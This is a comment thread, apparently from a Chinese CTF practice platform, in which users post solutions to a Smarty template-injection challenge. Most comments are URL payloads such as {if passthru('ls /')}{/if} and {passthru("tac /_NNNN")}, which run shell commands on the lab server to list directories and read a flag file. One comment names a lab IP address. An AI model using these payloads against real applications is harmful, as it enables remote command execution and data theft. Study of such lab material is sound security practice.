1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
?key={passthru("tac%20/_28710")}
?key={{passthru('ls /')}}
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了
flag{0e54d64e616af92957ddbb6c6ea37c5f}
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120
index.php?a={passthru("tac /_4060")}
fnmdp
好垃圾的靶场,明明flag出来了,但是提交显示不正确
看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}
...
评论
docker0w 3月前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 4月前
举报
?key={passthru("tac%20/_28710")}
yun20231227 5月前
举报
?key={{passthru('ls /')}}
xinkuang 7月前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
YUMEKO 9月前
举报
http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了
Daniel2023 10月前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}
一路奔腾 11月前
举报
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120
EtHat 1年前
举报
index.php?a={passthru("tac /_4060")}
FUCK123 7月前
举报
fnmdp
18904484271 1年前
举报
好垃圾的靶场,明明flag出来了,但是提交显示不正确
haker111 1年前
举报
看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}